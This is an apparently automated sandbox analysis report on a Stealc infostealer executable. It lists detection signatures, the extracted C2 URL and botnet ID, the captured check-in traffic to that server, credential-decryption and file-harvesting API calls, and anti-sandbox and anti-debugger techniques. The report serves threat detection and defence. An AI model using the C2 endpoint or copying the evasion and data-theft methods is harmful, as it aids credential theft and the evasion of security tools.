
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1531077
MD5: 3c4a472bba3dee50286e154336b9643e
SHA1: 8aeb79c1357013ae448e4365786b3352d5436b11
SHA256: 8bc63380429f0d4476b62f4e52eca341094f21d326f82535d61a5a5035840a89
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3C4A472BBA3DEE50286E154336B9643E)
  • cleanup
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7284 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7284 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.120000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-10T20:25:12.186591+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.120000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0012C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00127240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00127240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00129AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00129B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00138EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00138EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001338B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00134910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0012DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0012E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0012ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00134570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0012DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0012BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0012F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00133EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001216D0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a
    Data Ascii:
        ------CFHDBFIEGIDGIECBKJEC
        Content-Disposition: form-data; name="hwid"

        24CF2BE6DF91922063497
        ------CFHDBFIEGIDGIECBKJEC
        Content-Disposition: form-data; name="build"

        doma
        ------CFHDBFIEGIDGIECBKJEC--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00124880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a
    Data Ascii:
        ------CFHDBFIEGIDGIECBKJEC
        Content-Disposition: form-data; name="hwid"

        24CF2BE6DF91922063497
        ------CFHDBFIEGIDGIECBKJEC
        Content-Disposition: form-data; name="build"

        doma
        ------CFHDBFIEGIDGIECBKJEC--
Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/b5
Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpv
Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37vly

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 | 0_2_004FB047
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F2854 | 0_2_004F2854
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E50AC | 0_2_004E50AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EF124 | 0_2_004EF124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A71F3 | 0_2_003A71F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EBB7A | 0_2_004EBB7A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004053A8 | 0_2_004053A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F0D0D | 0_2_004F0D0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F5DFE | 0_2_004F5DFE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4DA8 | 0_2_004F4DA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E85BE | 0_2_004E85BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E3EDF | 0_2_004E3EDF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FC6D2 | 0_2_004FC6D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E9F9D | 0_2_004E9F9D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F77A9 | 0_2_004F77A9
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001245C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: wdprdbdb ZLIB complexity 0.9946403986873869
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00139600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00133720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00133720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K8ACIWTK.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1852928 > 1048576
Source: file.exe | Static PE information: Raw size of wdprdbdb is bigger than: 0x100000 < 0x19e400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.120000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wdprdbdb:EW;rwcfgkti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wdprdbdb:EW;rwcfgkti:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00139860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cdbc8 should be: 0x1d09e7
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: wdprdbdb
Source: file.exe | Static PE information: section name: rwcfgkti
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D205A push edi; mov dword ptr [esp], eax | 0_2_005D209C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], edx | 0_2_004FB085
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 3E3B42DCh; mov dword ptr [esp], edi | 0_2_004FB0AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 5AEF113Dh; mov dword ptr [esp], ecx | 0_2_004FB0C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], 7D9C48B7h | 0_2_004FB1C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push edx; mov dword ptr [esp], ecx | 0_2_004FB1D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], ebp | 0_2_004FB287
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], 77EAD90Ah | 0_2_004FB2A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push edx; mov dword ptr [esp], 3FFF3F9Eh | 0_2_004FB2FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 05A78CB0h; mov dword ptr [esp], eax | 0_2_004FB38D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push esi; mov dword ptr [esp], 5F727204h | 0_2_004FB3B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push ebp; mov dword ptr [esp], esi | 0_2_004FB433
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], 63DDDC61h | 0_2_004FB437
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 63242CFEh; mov dword ptr [esp], eax | 0_2_004FB444
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 273BF17Eh; mov dword ptr [esp], ebp | 0_2_004FB46E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push edx; mov dword ptr [esp], 2AB401F0h | 0_2_004FB484
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], edi | 0_2_004FB4E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 43ADD7B9h; mov dword ptr [esp], edx | 0_2_004FB572
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push edi; mov dword ptr [esp], esi | 0_2_004FB59B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 08C8D25Ah; mov dword ptr [esp], eax | 0_2_004FB616
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push ecx; mov dword ptr [esp], 00000000h | 0_2_004FB678
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 75731C7Fh; mov dword ptr [esp], edi | 0_2_004FB6D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push edi; mov dword ptr [esp], 47EF5DD5h | 0_2_004FB761
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push eax; mov dword ptr [esp], ecx | 0_2_004FB783
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 595A2AC5h; mov dword ptr [esp], ebx | 0_2_004FB7C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 6A25A400h; mov dword ptr [esp], edx | 0_2_004FB806
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push ebp; mov dword ptr [esp], ecx | 0_2_004FB82C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 4D5A1DD5h; mov dword ptr [esp], edi | 0_2_004FB83D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 743AA806h; mov dword ptr [esp], ebp | 0_2_004FB855
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 6DA213C0h; mov dword ptr [esp], edx | 0_2_004FB999
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FB047 push 4739350Ah; mov dword ptr [esp], esi | 0_2_004FB9E7
Source: file.exe | Static PE information: section name: wdprdbdb entropy: 7.95311750631902

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00139860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13542
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FA716 second address: 4FA73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push ebx 0x00000008 jmp 00007FB438CB0C08h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FA73A second address: 4FA744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB438C6F726h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5014A4 second address: 5014AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5014AA second address: 5014C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB438C6F726h 0x0000000a popad 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FB438C6F72Ch 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5014C9 second address: 501506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB438CB0BF6h 0x0000000a popad 0x0000000b jmp 00007FB438CB0C08h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB438CB0C02h 0x00000017 jl 00007FB438CB0BF6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5031F2 second address: 5031F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5032F8 second address: 50332F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 43C67732h 0x0000000c push 00000003h 0x0000000e sub edx, dword ptr [ebp+122D1BA2h] 0x00000014 push 00000000h 0x00000016 mov ecx, 754B452Dh 0x0000001b push 00000003h 0x0000001d push 880D5CA0h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB438CB0C01h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50332F second address: 503339 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 503339 second address: 50333F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50333F second address: 503388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F731h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 480D5CA0h 0x00000012 mov ecx, 6F5E6001h 0x00000017 lea ebx, dword ptr [ebp+124550FBh] 0x0000001d mov edi, 6CEEF6FAh 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB438C6F737h 0x0000002b rdtsc
